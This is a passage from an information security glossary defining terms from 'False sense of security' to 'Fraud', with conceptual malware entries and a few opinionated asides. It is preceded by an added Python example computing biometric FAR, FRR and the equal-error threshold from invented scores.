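An added worked example for the False Acceptance Rate and False Rejection Rate entries, not from the original glossary: given constructed matching scores for genuine and impostor attempts, it computes FAR and FRR for an accept-if-score-at-or-above-threshold rule, shows the trade-off as the threshold moves, and finds the threshold where the two rates are closest (the equal error rate point). The scores are invented for the example; the second function uses the whole-attempt denominator as CNSSI-4009 words it, the first the per-population denominator more common in biometric testing.

```python
# Constructed matching scores (higher = better match); not from the original page.
GENUINE_SCORES = [0.91, 0.88, 0.95, 0.70, 0.82, 0.60]   # legitimate user vs own template
IMPOSTOR_SCORES = [0.20, 0.35, 0.65, 0.40, 0.15, 0.72]  # someone else vs that template


def error_rates(genuine, impostor, threshold):
    """(FAR, FRR) for an accept-if-score >= threshold rule.

    FAR (type I error): impostor attempts accepted / impostor attempts.
    FRR (type II error): genuine attempts rejected / genuine attempts.
    """
    false_accepts = sum(1 for s in impostor if s >= threshold)
    false_rejects = sum(1 for s in genuine if s < threshold)
    return false_accepts / len(impostor), false_rejects / len(genuine)


def cnssi_style_rates(genuine, impostor, threshold):
    """Same counts divided by all identification attempts, as CNSSI-4009 phrases it."""
    total = len(genuine) + len(impostor)
    false_accepts = sum(1 for s in impostor if s >= threshold)
    false_rejects = sum(1 for s in genuine if s < threshold)
    return false_accepts / total, false_rejects / total


def equal_error_threshold(genuine, impostor):
    """Observed score at which FAR and FRR are closest: the equal error rate point."""
    candidates = sorted(set(genuine) | set(impostor))

    def gap(t):
        far, frr = error_rates(genuine, impostor, t)
        return abs(far - frr)

    return min(candidates, key=gap)


def tradeoff_table(genuine, impostor):
    """FAR/FRR at every observed score, to show that tightening one loosens the other."""
    return [(t, *error_rates(genuine, impostor, t))
            for t in sorted(set(genuine) | set(impostor))]


if __name__ == "__main__":
    for t, far, frr in tradeoff_table(GENUINE_SCORES, IMPOSTOR_SCORES):
        print(f"threshold {t:.2f}  FAR {far:.3f}  FRR {frr:.3f}")
    print("EER threshold:", equal_error_threshold(GENUINE_SCORES, IMPOSTOR_SCORES))
```

Raising the threshold drives FAR towards zero at the cost of rejecting more legitimate users; which rate matters more depends on whether the system is guarding a data centre door or unlocking a phone.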
|
False sense of security
|
Vulnerability
involving an unwarranted and inappropriate faith in the security/control
arrangements stemming from inadequate assurance and naïveté – for example,
believing that antivirus
software totally prevents malware incidents.
|
Fast-flux
DNS,
fast-flux botnet
|
Black
hat high-availability
and concealment technique that uses proxy servers or DNS changes to redirect botnet traffic
(commands and/or data)
dynamically to any of a set of distributed servers so that, even if
individual servers in the set are shut down by the authorities, others remain reachable.
|
Fault
|
Problem with information processing or communications systems including a security incident, complete
or partial system failure (outage),
program error/bug, virus, or some other generally
unanticipated and undesirable mode of operation etc.
|
Fault
tolerance
|
High-availability
design goal that systems should
survive faults and
other incidents
that would otherwise cause failures or unplanned outages. A strong but highly specific
form of resilience.
|
Fax
machine
|
“A device that allows copies of documents to be sent
over a telephone network” (NZ Information Security Manual).
No kidding!
|
FBI
(Federal Bureau of Investigation)
|
Spooky
US government agency responsible for domestic intelligence and surveillance deliberately targeting US
citizens. Founded by J Edgar Hoover. See also CIA and DHS.
|
FedRAMP
(Federal Risk and Authorization Management Program)
|
US program imposing good practice security standards (principally NIST SP800-53)
on the suppliers of cloud
computing services for government use.
|
Femto
cell,
home cell,
small cell
|
A cellphone repeater or base station providing cellular
service in a limited local area, typically within a building, where the conventional
cellular coverage is limited or non-existent. “Small, low-power cellular
base station. Note: A femto cell is typically designed for use in a home or
small businesses” (ISO/IEC
27033-6).
|
Fibre
channel,
fiber channel
|
“Serial I/O interconnect capable of supporting multiple
protocols, including access to open system storage, access to mainframe
storage, and networking. Note: Fibre Channel supports point to point,
arbitrated loop, and switched topologies with a variety of copper and optical
links running at speeds from 1 gigabit per second to over 10 gigabits per
second” (ISO/IEC
27040).
|
Fibre channel interconnect
|
“Serial Small Computer System Interface (SCSI)
transport protocol used on Fibre Channel interconnects” (ISO/IEC 27040).
|
Fidelity insurance,
fidelity bond
|
Insurance
against the costs and losses to an organisation arising from incidents
involving deliberate acts of disloyalty or dishonesty by its workers or agents (e.g. advisors
and other service providers).
|
Fiduciary
|
A responsibility
based on trust and
ethics, for
example officers of an organisation
are legally and morally required, obliged or bound to act in the best
interests of the organisation’s owners
and other stakeholders,
even if doing so conflicts with their personal interests. See also malfeasance, due care and fidelity insurance.
|
Fileless
malware
|
Cloud-based malware
that executes in RAM, exploiting
apps and utilities
such as web browsers, PowerShell
and WMI supposedly
without leaving behind distinctive files on an infected system’s disks. PowerSploit’s obfuscated PowerShell scripts, for
instance, may not be detected reliably by antivirus packages and, even if they
remain on the disk, may escape forensic
analysis. Malware components may be stored in registry entries or hidden inside
other files or in obscure directories.
|
Filing
system
|
Structured, systematic, organised and usually indexed or catalogued
arrangement for information
storage, search, retrieval and referencing. “Any structured set of
personal data which are accessible according to specific criteria, whether
centralised, decentralised or dispersed on a functional or geographical
basis” (GDPR).
|
Filter
|
“A device that controls the flow of data in accordance
with a security policy” (NZ Information Security Manual).
|
Filtering
|
“Process of accepting or rejecting data flows through a
network, according to specified criteria” (ISO/IEC 27033-1).
|
Fingerprint
|
Literally, the print mark left behind on a surface by a
finger, a biometric.
Often used figuratively to indicate characteristics that uniquely identify a
person (e.g. using DNA profiling), system or data. Despite theoretical claims as to
their uniqueness, gathering and analysing any kind of fingerprint creates
practical constraints on the scientific accuracy, hence there is a small but
finite possibility that fingerprints from different individuals, systems or
data may fail to be distinguished in practice. Furthermore, being
biometrics, confidentiality
is a challenge for the owner
and they cannot be changed if compromised.
See also hash.
|
FIPS
197 (Federal Information Processing Standard № 197)
|
Standard
published by NIST in 2001 specifying AES.
See http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf
|
Fire
|
Along with smoke, one of many physical security threats, whether caused by accident or
intentionally (arson).
See also flood, intruder and malicious damage.
|
Fireball
|
One of several nasty species of malware in the wild in 2018. A browser hijacker
and downloader.
|
Firewall
|
Specialized network
router specifically configured as a security gateway monitoring, controlling and filtering traffic between
network segments,
nodes and devices
according to a set of access
control rules.
“Type of security barrier placed between network environments --
consisting of a dedicated device or a composite of several components and
techniques -- through which all traffic from one network environment
traverses to another, and vice versa, and only authorized traffic, as defined
by the local security policy, is allowed to pass” (ISO/IEC 27033-1). “A
network protection device that filters incoming and outgoing network data,
based on a series of rules” (NZ Information Security Manual).
See also packet filter, stateful firewall and deep packet
inspection.
|
Firmware
|
Software
loaded into a memory chip or similar hardware device, normally embedded in hardware
interfaces to control
and communicate with specialist devices such as plant controllers, disk
drives or network
cards. The BIOS on
a computer motherboard is an example. “Software embedded in a hardware
device” (NZ Information Security Manual).
|
FISA (Foreign Intelligence Surveillance Act)
|
US law unilaterally permitting the US government to snoop on foreigners’ information for US intelligence, counterterrorism and (presumably) cyberwarfare, economic, political or other purposes. Became law in 1978, amended in 2008. Established the Foreign Intelligence Surveillance Court as a SECRET oversight body to mediate official access requests by the NSA, CIA, FBI or other agencies/authorities.
|
FISMA (Federal Information Security Management Act)
|
US law imposing information risk-based security and privacy obligations on government agencies and, to some extent, their suppliers. “A statute (Title III, P.L. 107-347) that requires agencies to assess risk to information systems and provide information security protections commensurate with the risk. FISMA also requires that agencies integrate information security into their capital planning and enterprise architecture processes, conduct annual information systems security reviews of all programs and systems, and report the results of those reviews to OMB.” (CNSSI-4009).
|
Five Eyes
|
A strategic alliance/collaboration between the governments of the USA, Canada, UK, Australia and New Zealand to share intelligence capabilities and information. Evolved from the UKUSA bilateral ‘special arrangement’ that had in effect been in place since WWII or before. Whereas the security agencies are not supposed to snoop on their own citizens, they can do so via their Five Eyes partners – a convenient means of bypassing the governance control.
|
Flash memory [media]
|
Data storage device using a silicon chip as the media, in a manner that retains the data indefinitely without consuming power, such as a USB memory stick. “A specific type of EEPROM” (NZ Information Security Manual).
|
Flaw
|
A fundamental and inherent vulnerability, weakness or failing. In the context of software security, flaws are generally errors in the system design or architecture that create or expose information security vulnerabilities. Flaws in corporate governance, risk management, information security management, business continuity management etc. can result in an organisation’s abject failure to characterize and treat reasonably foreseeable (let alone unforeseeable) risks.
|
Flood
|
(a) A surprisingly common physical security threat. Due to global warming, the number of natural disasters involving flooding has increased markedly in recent years, while leaking pipes, blocked sewers and sprinkler systems remain as prevalent as ever. See also fire, intruder and malicious damage. (b) Accidentally overwhelm an IT system or network with a high volume of traffic, for example an abnormally high peak load on a heavily-promoted website or a tsunami of spurious packets generated by a hardware error on a network node. (c) Deliberately overwhelm an IT system or network with large volumes of generated traffic in an attempt to cause a denial of service or to slip a covert attack past failing security controls.
|
Fly lead
|
“A lead that connects IT equipment to the fixed infrastructure of the facility. For example, the lead that connects a workstation to a network wall socket” (NZ Information Security Manual).
|
FM-200
|
Fire suppressant or extinguishant chemical from DuPont popular in automated fire control systems.
|
FMEA (Failure Mode Effects Analysis)
|
Structured bottom-up engineering method, pioneered by NASA, to analyse potential reliability, safety or security risks or issues early in the system development lifecycle, identifying how the system might possibly fail (e.g. due to single points of failure). Used to design more resilient, robust, secure and safe systems.
|
Foothold, launch pad, stepping stone, pivot point
|
The system initially compromised on a hacked network, from which further probes and attacks may be launched. May be any vulnerable networked system, including things, multifunction devices, desktops, portables, servers etc.
|
Forbid
|
Explicitly prohibit, i.e. withhold consent, authorisation or permission for someone to do something, go somewhere etc., or face the consequences.
|
Forensic, forensics
|
Relating to the law courts. See also digital forensics. “The practice of gathering, retaining, and analyzing computer-related data for investigative purposes in a manner that maintains the integrity of the data” (CNSSI-4009).
|
Forensic copy
|
More than just a copy of an item of forensic evidence, a forensic copy has been produced by a specific, forensically-sound method that gives an extremely high level of assurance that the copy is an authentic and complete duplicate of the original – for example, a bitwise image of a computer disk, created using a particular set of forensic tools, with a cryptographic hash value identical to the original.
|
Forensic evidence
|
Evidence destined to be used in court. The legal system imposes strict integrity requirements on evidence, requiring strong assurance measures such as a valid and unbroken chain of custody.
|
Forger
|
The fraudster who commits forgery.
|
Forgery
|
Fraudulent counterfeiting of items such as negotiable instruments (e.g. banknotes), credentials etc.
|
Fork bomb, wabbit
|
Malware that spawns one or more copies of itself and starts those copies running, so that the number of copies grows exponentially until finite system resources are exhausted and, generally, the entire system is brought to a halt, i.e. a denial of service attack.
|
Form grabber, grabber, form jacking
|
Malware that captures data entered by the system user into online forms, particularly credentials used for authentication.
|
FOSS (Free Open Source Software)
|
Software source code that its owner deliberately publishes and permits or encourages others to use, change and ideally improve as a collaborative public effort. ‘Free’ refers to liberty, not necessarily price: some FOSS suppliers, for example, provide additional chargeable services such as professional support and patching.
|
FOUO (For Official Use Only)
|
Deprecated US government label applied to unclassified information containing content that may have been exempt from mandatory disclosure under the Freedom of Information Act. Replaced by CUI.
|
Frame
|
(a) Falsely yet credibly accuse someone of something untoward, such as a crime, or deflect the blame their way in such a way that they appear guilty whereas the guilty party appears innocent. An integrity failure. A form of social engineering. (b) Permanent wooden or metal structure into which a door or window may be fixed by hinges, catches and locks. The strength of the frame and its fixture to the surrounding wall are critical to the ability of the door or window to resist brute force attacks, fires, floods etc. The entire structure, plus the associated processes (such as architecture and design, operation and maintenance), constitutes a physical security control system.
|
Framework
|
A conceptual or physical structure or skeleton linking related items together, providing a logical basis or foundation for further construction, understanding and use. May involve models, blueprints, architecture and design specifications, nodes and linkages, systems (such as management systems), methods, approaches, standards, policies, guidelines etc. May be theoretical or practical. Information security frameworks typically concern governance, information risk, compliance, privacy and related matters, in whole or in part.
|
Fraud, con
|
Theft, misappropriation or similar crime involving deliberate deception or misrepresentation of the target by a fraudster, usually for unfair advantage or illegal gain. Many forms of fraud are known, e.g. assuming someone else’s name and masquerading as them (identity fraud); promising victims a large payout on receipt of an advance fee; causing victims unwittingly to call a premium-rate phone number and so rack up a large bill (toll fraud); tricking victims into downloading malware or visiting unsavoury/undesirable websites (click bait); falsifying or inflating expenses claimed (expenses fraud); falsifying financial records (accounting or tax fraud); substituting bank account numbers (payment fraud). See also scam.
|
Fraud recovery fraud
|
Follow-on fraud in which fraudsters, typically claiming to be lawyers, barristers, police officers etc., promise to help victims of prior frauds recover their losses, prosecute the original fraudsters etc. Fraud victims have, in effect, already demonstrated their naïveté, gullibility and susceptibility in the earlier incidents and may still be ignorant or in a psychological state of denial, hence being relatively vulnerable to subsequent frauds by selfish, heartless, exploitative low-life pond scum totally devoid of compassion.
|
Fraudster, con artist
|
Deceitful, deceptive person who commits or perpetrates fraud. Sometimes incorrectly called ‘the fraud’ which, strictly speaking, is the incident not the perpetrator.
|
Freedom Of Information Act (FOIA)
|
Laws in many jurisdictions require public bodies to disclose potentially sensitive information under certain conditions, typically for public interest reasons, on request by a member of the public following the prescribed procedures. When entire documents or data sets are to be disclosed under FOIA, it may be necessary to redact parts, e.g. to safeguard ongoing covert operations and operatives (typically informers, moles and spies) or to protect privacy or national security.
|
Freeware
|
Software that is legitimately and legally free of usage restrictions, typically as a result of having been released intentionally into the public domain by its owner.
|
Freezer spray
|
|